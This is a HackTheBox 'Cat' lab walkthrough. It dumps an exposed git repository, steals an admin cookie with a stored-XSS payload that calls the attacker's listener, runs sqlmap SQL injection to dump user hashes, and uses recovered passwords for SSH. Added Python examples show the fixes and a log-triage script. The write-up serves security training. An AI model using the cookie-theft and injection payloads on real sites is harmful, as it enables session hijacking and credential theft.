HackTheBox Cat

The document details a penetration testing scenario on a Linux machine, where vulnerabilities such as XSS and SQL Injection are exploited to gain access. After scanning the machine and discovering open ports, the attacker finds a Git repository, dumps its contents, and retrieves sensitive information including user and root passwords. The process highlights the use of tools like RustScan and Gobuster for reconnaissance and exploitation.


2/2/25, 1:13 PM HackTheBox Cat

HackTheBox Cat
On a medium-difficulty Linux machine from the Vice season, we dump the application's source code,
find XSS and SQL injection in it, and get initial access to the system. In the logs
we find a user's password and escalate our account. In the end, we use a vulnerability in Gitea:
via XSS we turn it into an LFI and read an important file, in which we find the root user's password.

Reconnaissance
As usual, let's scan the ports with rustscan:

$ rustscan -a 10.129.229.61 -- -sCTV -Pn


.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________

file:///home/core/Downloads/HackTheBox Cat.html 1/25
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"


[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.129.229.61:80
Open 10.129.229.61:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sCTV -Pn" on ip 10.129.229.61
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2025-02-02 07:12 UTC
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 07:12
Completed Parallel DNS resolution of 1 host. at 07:12, 3.51s elapsed
DNS resolution of 1 IPs took 3.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating Connect Scan at 07:12
Scanning 10.129.229.61 [2 ports]
Discovered open port 22/tcp on 10.129.229.61
Discovered open port 80/tcp on 10.129.229.61
Completed Connect Scan at 07:12, 0.09s elapsed (2 total ports)
Initiating Service scan at 07:12
Scanning 2 services on 10.129.229.61
Completed Service scan at 07:12, 6.14s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.229.61.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 3.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.63s elapsed
NSE: Starting runlevel 3 (of 3) scan.

Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
Nmap scan report for 10.129.229.61
Host is up, received user-set (0.068s latency).
Scanned at 2025-02-02 07:12:13 UTC for 11s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
| 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:12
Completed NSE at 07:12, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.36 seconds

The ports are typical for HTB Linux machines, and the http-title redirect already reveals the hostname, so we just add the domain to /etc/hosts:

echo "10.129.229.61 cat.htb" | sudo tee -a /etc/hosts

Let's not forget to take a look at the website cat.htb:

Searching for interesting directories with gobuster turns up a Git repository on the server:

$ gobuster dir -u http://cat.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cat.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git (Status: 301) [Size: 301] [--> http://cat.htb/.git/]
/.git/config (Status: 200) [Size: 92]
/.git/HEAD (Status: 200) [Size: 23]
/.git/index (Status: 200) [Size: 1726]
/.git/logs/refs (Status: 301) [Size: 311] [--> http://cat.htb/.git/logs/refs/]
/.git/logs/HEAD (Status: 200) [Size: 150]
/admin.php (Status: 302) [Size: 1] [--> /join.php]
/config.php (Status: 200) [Size: 1]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

Foothold

Naturally, we dump this repository with git-dumper. Let's install it:

python -m venv env
source env/bin/activate
pip install git-dumper

This is what the dump looks like:

$ git-dumper http://cat.htb/.git cathtb
[-] Testing http://cat.htb/.git/HEAD [200]
[-] Testing http://cat.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://cat.htb/.gitignore [404]
[-] http://cat.htb/.gitignore responded with status code 404
[-] Fetching http://cat.htb/.git/description [200]
[-] Fetching http://cat.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://cat.htb/.git/hooks/post-receive.sample [404]
[-] http://cat.htb/.git/hooks/post-commit.sample responded with status code 404
[-] http://cat.htb/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://cat.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://cat.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://cat.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://cat.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://cat.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://cat.htb/.git/index [200]
[-] Fetching http://cat.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://cat.htb/.git/info/exclude [200]
[-] Fetching http://cat.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://cat.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://cat.htb/.git/objects/info/packs [404]
[-] http://cat.htb/.git/objects/info/packs responded with status code 404
[-] Fetching http://cat.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://cat.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://cat.htb/.git/hooks/update.sample [200]
[-] Finding refs/
[-] Fetching http://cat.htb/.git/FETCH_HEAD [404]
[-] Fetching http://cat.htb/.git/config [200]
[-] http://cat.htb/.git/FETCH_HEAD responded with status code 404
[-] Fetching http://cat.htb/.git/logs/refs/heads/staging [404]
[-] http://cat.htb/.git/logs/refs/heads/staging responded with status code 404
[-] Fetching http://cat.htb/.git/ORIG_HEAD [404]
[-] http://cat.htb/.git/ORIG_HEAD responded with status code 404
[-] Fetching http://cat.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://cat.htb/.git/logs/refs/heads/production [404]
[-] Fetching http://cat.htb/.git/logs/refs/heads/main [404]
[-] Fetching http://cat.htb/.git/logs/HEAD [200]
[-] http://cat.htb/.git/logs/refs/heads/main responded with status code 404
[-] http://cat.htb/.git/logs/refs/heads/production responded with status code 404
[-] Fetching http://cat.htb/.git/HEAD [200]
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/master [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/master responded with status code
404
[-] http://cat.htb/.git/logs/refs/remotes/origin/HEAD responded with status code
404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/main [404]
[-] Fetching http://cat.htb/.git/logs/refs/heads/development [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/main responded with status code
404
[-] http://cat.htb/.git/logs/refs/heads/development responded with status code 404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/staging [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/staging responded with status
code 404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/production [404]
[-] Fetching http://cat.htb/.git/logs/refs/stash [404]
[-] http://cat.htb/.git/logs/refs/stash responded with status code 404
[-] http://cat.htb/.git/logs/refs/remotes/origin/production responded with status
code 404
[-] Fetching http://cat.htb/.git/logs/refs/remotes/origin/development [404]
[-] http://cat.htb/.git/logs/refs/remotes/origin/development responded with status
code 404
[-] Fetching http://cat.htb/.git/packed-refs [404]
[-] http://cat.htb/.git/packed-refs responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/main [404]
[-] Fetching http://cat.htb/.git/refs/heads/master [200]
[-] http://cat.htb/.git/refs/heads/main responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/staging [404]
[-] http://cat.htb/.git/refs/heads/staging responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/production [404]
[-] http://cat.htb/.git/refs/heads/production responded with status code 404
[-] Fetching http://cat.htb/.git/refs/heads/development [404]
[-] http://cat.htb/.git/refs/heads/development responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/HEAD [404]
[-] http://cat.htb/.git/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/staging [404]
[-] Fetching http://cat.htb/.git/refs/remotes/origin/master [404]
[-] http://cat.htb/.git/refs/remotes/origin/master responded with status code 404
[-] http://cat.htb/.git/refs/remotes/origin/staging responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/main [404]
[-] http://cat.htb/.git/refs/remotes/origin/main responded with status code 404
[-] Fetching http://cat.htb/.git/refs/remotes/origin/development [404]
[-] Fetching http://cat.htb/.git/refs/remotes/origin/production [404]
[-] http://cat.htb/.git/refs/remotes/origin/production responded with status code
404
[-] http://cat.htb/.git/refs/remotes/origin/development responded with status code
404
[-] Fetching http://cat.htb/.git/refs/stash [404]
[-] http://cat.htb/.git/refs/stash responded with status code 404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/main [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/main responded with status code
404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/master responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/staging [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/staging responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/development [404]
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/development responded with
status code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/main [404]
[-] Fetching http://cat.htb/.git/refs/wip/wtree/refs/heads/production [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/main responded with status code
404
[-] http://cat.htb/.git/refs/wip/wtree/refs/heads/production responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/development [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/development responded with
status code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/master [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/master responded with status
code 404
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/production [404]
[-] Fetching http://cat.htb/.git/refs/wip/index/refs/heads/staging [404]
[-] http://cat.htb/.git/refs/wip/index/refs/heads/production responded with status code 404
[-] http://cat.htb/.git/refs/wip/index/refs/heads/staging responded with status code 404
[-] Fetching http://cat.htb/.git/info/refs [404]
[-] http://cat.htb/.git/info/refs responded with status code 404
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://cat.htb/.git/objects/b8/7b8c6317f8e419dac2c3ce3517a6c93b235028
[200]
[-] Fetching http://cat.htb/.git/objects/88/12266cb97013f416c175f9a9fa08aae524c92a
[200]
[-] Fetching http://cat.htb/.git/objects/56/03bb235ee634e1d7914def967c26f9dd0963bb
[200]
[-] Fetching http://cat.htb/.git/objects/58/62718ef94b524f3e36627e6f2eae1e3570a7f4
[200]
[-] Fetching http://cat.htb/.git/objects/64/d98c5af736de120e17eff23b17e22aad668718
[200]
[-] Fetching http://cat.htb/.git/objects/09/7745b30047ab3d3e6e0c5239c2dfd5cac308a5
[200]
[-] Fetching http://cat.htb/.git/objects/8c/2c2701eb4e3c9a42162cfb7b681b6166287fd5
[200]
[-] Fetching http://cat.htb/.git/objects/31/e87489c5f8160f895e941d00087bea94f21315
[200]
[-] Fetching http://cat.htb/.git/objects/0c/be0133fb00b13165bd7318e42e17f322daac7f
[200]
[-] Fetching http://cat.htb/.git/objects/26/bd62c92bcf4415f2b82514bbbac83936c53cb5
[200]
[-] Fetching http://cat.htb/.git/objects/00/00000000000000000000000000000000000000
[404]
[-] http://cat.htb/.git/objects/00/00000000000000000000000000000000000000
responded with status code 404
[-] Fetching http://cat.htb/.git/objects/9a/dbf70baf0e260d84d9c8666a0460e75e8be4a8
[200]
[-] Fetching http://cat.htb/.git/objects/b7/df8d295f9356332f9619ae5ecec3230a880ef2
[200]
[-] Fetching http://cat.htb/.git/objects/38/660821153b31dbbee89396eacf974c095ab0dc
[200]
[-] Fetching http://cat.htb/.git/objects/91/92afa265e9e73f533227e4f118f882615d3640
[200]
[-] Fetching http://cat.htb/.git/objects/c9/e281ffb3f5431800332021326ba5e97aeb2764
[200]
[-] Fetching http://cat.htb/.git/objects/0f/fa90ae01a4f353aa2f6b2de03c212943412222
[200]
[-] Fetching http://cat.htb/.git/objects/6f/ae98c9ae65a9ecbf37e821e7bafb48bcdac2bc
[200]
[-] Fetching http://cat.htb/.git/objects/cf/8166a8873d413e6afd88fa03305880e795a2c6 [200]
[-] Fetching http://cat.htb/.git/objects/9b/e1a76f22449a7876a712d34dc092f477169c36 [200]
[-] Fetching http://cat.htb/.git/objects/48/21d0cd8fecc8c3579be5735b1aab69f1637c86
[200]
[-] Fetching http://cat.htb/.git/objects/7b/a662bf012ce71d0db9e86c80386b7ae0a54ea1
[200]
[-] Running git checkout .

In contest.php we find an XSS opportunity: the username parameter, taken from the session,
is not validated and is written to the database as-is:

Then view_cat.php reads this value back and renders it to the user:

Let's register and submit our XSS payload as the username:

<img src=x onerror=this.src="http://10.10.16.11:4243/"+btoa(document.cookie)>

Let's launch an HTTP server on our side and submit our cat to the competition, attaching any valid
image:

python3 -m http.server 4243

And we catch the administrator's cookie (if it doesn't work, reset the machine or reconnect the VPN;
the machine is unstable):

Decode the captured cookie from base64:

$ echo UEhQU0VTU0lEPWpjZThia2VtdDlvNTZ1dDR1Y2lwamJib3Yx | base64 -d
PHPSESSID=jce8bkemt9o56ut4ucipjbbov1

Let's swap in this session cookie and open the admin panel:

From the application code we can see that it is SQLite:

And in accept_cat.php we find a SQL injection, which we hand to sqlmap:

We give sqlmap the required cat ID and name, the session cookie and the database type,
and it finds two blind SQL injections:

$ sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=catty" --cookie="PHPSESSID=jce8bkemt9o56ut4ucipjbbov1" -p catName --level=5 --risk=3 --dbms=SQLite
...
---
Parameter: catName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catId=1&catName=catty'||(SELECT CHAR(114,97,83,88) WHERE 5931=5931 AND 1212=1212)||'

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: catId=1&catName=catty'||(SELECT CHAR(69,77,83,120) WHERE 8467=8467 AND 6442=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
...
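As an added example (not the machine's PHP, which the writeup shows only as screenshots), here are the two flaws described above, the unescaped username from contest.php/view_cat.php and the catName concatenated into SQL in accept_cat.php, reconstructed in Python against an in-memory SQLite database, each next to its fix. The schema, table and function names are assumptions.

```python
"""Added example, not the application's own code: the stored-XSS and SQLi
patterns from this writeup rebuilt in Python on SQLite, each beside its fix.
Schema, table and function names are assumptions."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's SQLite file (names are assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT);
        CREATE TABLE cats  (cat_id INTEGER PRIMARY KEY, cat_name TEXT,
                            accepted INTEGER DEFAULT 0);
        INSERT INTO users (username) VALUES ('admin');
        INSERT INTO cats  (cat_name) VALUES ('catty');
        """
    )
    return conn


def _cat_name(conn: sqlite3.Connection, cat_id: int) -> str:
    row = conn.execute("SELECT cat_name FROM cats WHERE cat_id = ?", (cat_id,)).fetchone()
    return row[0]


def accept_cat_vulnerable(conn: sqlite3.Connection, cat_id: int, cat_name: str) -> str:
    """accept_cat.php pattern: catName is pasted into the SQL text, so a quote
    followed by SQLite's || operator changes the statement (sqlmap's payload
    above has exactly that shape).  Returns the value actually stored."""
    sql = (f"UPDATE cats SET cat_name = '{cat_name}', accepted = 1 "
           f"WHERE cat_id = {int(cat_id)}")
    conn.execute(sql)
    return _cat_name(conn, int(cat_id))


def accept_cat_safe(conn: sqlite3.Connection, cat_id: int, cat_name: str) -> str:
    """Fix: bound parameters travel as data; the quote and || stay literal."""
    conn.execute("UPDATE cats SET cat_name = ?, accepted = 1 WHERE cat_id = ?",
                 (cat_name, int(cat_id)))
    return _cat_name(conn, int(cat_id))


def render_username_vulnerable(username: str) -> str:
    """view_cat.php pattern: the stored username goes into HTML untouched, so a
    value chosen at registration runs in the admin's browser."""
    return f"<p>Submitted by: {username}</p>"


def render_username_safe(username: str) -> str:
    """Fix: escape for the HTML text-node context at output time (and reject
    or length-limit the value at registration as defence in depth)."""
    return f"<p>Submitted by: {html.escape(username, quote=True)}</p>"


if __name__ == "__main__":
    # Constructed payloads in the same shape as the ones on the page.
    sqli = "catty'||(SELECT 'injected')||'"
    xss = "<img src=x onerror=alert(1)>"
    print(accept_cat_vulnerable(make_db(), 1, sqli))  # cattyinjected
    print(accept_cat_safe(make_db(), 1, sqli))        # the literal payload string
    print(render_username_vulnerable(xss))
    print(render_username_safe(xss))
```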

Now we dump the users table via the boolean-based blind SQL injection (if you get server errors,
reduce the number of threads or restart the dump):

sqlmap -u "http://cat.htb/accept_cat.php" --data "catId=1&catName=catty" --cookie="PHPSESSID=jce8bkemt9o56ut4ucipjbbov1" -p catName --level=5 --risk=3 --dbms=SQLite --technique=B -T "users" --threads=4 --dump

The almost-complete dump looks like this; I didn't continue:

+---------+-------------------------------+----------------------------------+----------+
| user_id | email                         | password                         | username |
+---------+-------------------------------+----------------------------------+----------+
| 1       | axel2017@gmail.com            | d1bbba3670feb9435c9841e46e60ee2f | axel     |
| 2       | rosamendoza485@gmail.com      | ac369922d560f17d6eeb8b2c7dec498c | rosa     |
| 3       | robertcervantes2000@gmail.com | 42846631708f69c00ec0c0a8aa4a92ad | robert   |
| 4       | fabiancarachure2323@gmail.com | 39e153e825c4a3d314a0dc7f7475ddbe | fabian   |
| 5       | jerrysonC343@gmail.com        | 781593e060f8d065cd7281c5ec5b4b86 | jerryson |
| <blank> | larryP5668C?????????          | <blank>                          | <blank>  |
| <blank> | <blank>                       | <blank>                          | <blank>  |
| <blank> | <blank>                       | <blank>                          | <blank>  |
| <blank> | <blank>                       | <blank>                          | <blank>  |
| <blank> | <blank>                       | <blank>                          | <blank>  |
| <blank> | <blank>                       | <blank>                          | <blank>  |
+---------+-------------------------------+----------------------------------+----------+

Let's run the MD5 hashes through CrackStation and recover the password of user rosa:

Let's try this password for SSH and get inside the system:

sshpass -p'soyunaprincesarosa' ssh -o StrictHostKeyChecking=no rosa@cat.htb

User
Let's look at other users in the system:

$ ls -la /home
total 24
drwxr-xr-x 6 root root 4096 Aug 30 23:19 .
drwxr-xr-x 19 root root 4096 Aug 31 18:28 ..
drwxr-x--- 5 axel axel 4096 Jan 21 12:52 axel
drwxr-x--- 3 git git 4096 Jan 21 12:49 git
drwxr-x--- 6 jobert jobert 4096 Jan 21 12:49 jobert
drwxr-x--- 5 rosa rosa 4096 Jan 21 12:49 rosa

Let's search the Apache2 logs for the username axel:

$ grep axel /var/log/apache2 -R
...
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:19 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:30 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:41 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:29:52 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
./access.log.1:127.0.0.1 - - [31/Jan/2025:12:30:03 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
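Two things on this box are visible from the web server's own logs: the wordlist enumeration that found /.git (the gobuster run earlier) and the login credentials that landed in access.log because join.php accepted them as GET parameters (just above). The triage script below is an added example, not part of the writeup; its log lines are constructed to match the format shown above, the parameter names are the page's, and the values and thresholds are made up.

```python
"""Added example (not from the original writeup): Apache access-log triage for
two of the conditions this box exposes, plus the log-side mitigation.  Sample
lines are constructed in the combined-log format seen on the page."""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Query-string keys that should never travel in a GET, and so never in a log.
SECRET_KEYS = re.compile(r"pass(word|wd)?|pwd|secret|token|cookie|session", re.I)

# Constructed sample: one credential leak, one /.git enumeration burst, one benign hit.
SAMPLE_LOG = """\
127.0.0.1 - - [31/Jan/2025:12:29:19 +0000] "GET /join.php?loginUsername=axel&loginPassword=p4ssw0rd-example&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0"
10.0.0.5 - - [31/Jan/2025:12:31:02 +0000] "GET /.git/ HTTP/1.1" 301 301 "-" "gobuster/3.6"
10.0.0.5 - - [31/Jan/2025:12:31:02 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "gobuster/3.6"
10.0.0.5 - - [31/Jan/2025:12:31:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "gobuster/3.6"
10.0.0.5 - - [31/Jan/2025:12:31:03 +0000] "GET /backup.zip HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.0.0.5 - - [31/Jan/2025:12:31:03 +0000] "GET /old.php HTTP/1.1" 404 275 "-" "gobuster/3.6"
192.0.2.7 - - [31/Jan/2025:12:40:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield parsed records; lines that do not match the format are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def secrets_in_query(lines):
    """Finding 1: credentials passed as GET parameters.  Returns (ip, path, key)
    with the value deliberately omitted so the report is not itself a leak."""
    hits = []
    for rec in parse(lines):
        parts = urlsplit(rec["target"])
        for key, _value in parse_qsl(parts.query, keep_blank_values=True):
            if SECRET_KEYS.search(key):
                hits.append((rec["ip"], parts.path, key))
    return hits


def repo_exposure(lines):
    """Finding 2: requests under /.git answered with 2xx/3xx, i.e. repository
    metadata is really being served, grouped by requesting client."""
    served = defaultdict(list)
    for rec in parse(lines):
        path = urlsplit(rec["target"]).path
        if path.startswith("/.git") and rec["status"][0] in "23":
            served[rec["ip"]].append(path)
    return dict(served)


def scanner_candidates(lines, min_requests=4, min_404_ratio=0.4):
    """Clients with a burst of requests and a high 404 share look like wordlist
    enumeration (the gobuster run on the page).  Thresholds are assumptions."""
    total, not_found = Counter(), Counter()
    for rec in parse(lines):
        total[rec["ip"]] += 1
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
    return sorted(
        ip for ip, n in total.items()
        if n >= min_requests and not_found[ip] / n >= min_404_ratio
    )


def redact_line(line):
    """Log-side mitigation: mask values of sensitive query keys before the line
    is retained, so a later reader with log access learns nothing from it."""
    return re.sub(
        r"([?&])([^=&\s]*(?:pass|pwd|secret|token)[^=&\s]*)=([^&\s\"]*)",
        lambda m: f"{m.group(1)}{m.group(2)}=[REDACTED]",
        line,
        flags=re.I,
    )


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print(secrets_in_query(lines))    # [('127.0.0.1', '/join.php', 'loginPassword')]
    print(repo_exposure(lines))       # {'10.0.0.5': ['/.git/', '/.git/config', '/.git/HEAD']}
    print(scanner_candidates(lines))  # ['10.0.0.5']
    print(redact_line(lines[0]))
```

The real fix for finding 1 is on the application side (credentials only in POST bodies) and in Apache's LogFormat; the redaction shows what to do with lines that were already written.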

Let's reconnect as axel using SSH:

sshpass -p'aNdZwgC4tI9gnVXv_e3Q' ssh -o StrictHostKeyChecking=no axel@cat.htb

User flag

Privilege Escalation
We saw the user git, so let's look at the network connections:

$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:40543         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:59173         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:41189         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:34936         127.0.1.1:80            TIME_WAIT   timewait (38.70/0/0)
tcp        0      0 127.0.0.1:59124         127.0.1.1:80            TIME_WAIT   timewait (6.61/0/0)
tcp        0      0 127.0.0.1:33404         127.0.1.1:80            TIME_WAIT   timewait (28.00/0/0)
tcp        0      1 10.129.153.108:55986    8.8.8.8:53              SYN_SENT    on (1.70/1/0)
tcp        0      0 127.0.0.1:51730         127.0.0.1:40543         ESTABLISHED off (0.00/0/0)

Ports 25 and 3000 are of interest. And when logging in as axel, we were told that we have mail:

$ cat /var/mail/axel
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care
website and other projects. Please send an email to jobert@localhost with
information about your Gitea repository. Jobert will check if it is a promising
service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can
understand it properly. I will review the whole repository.

From rosa@cat.htb Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
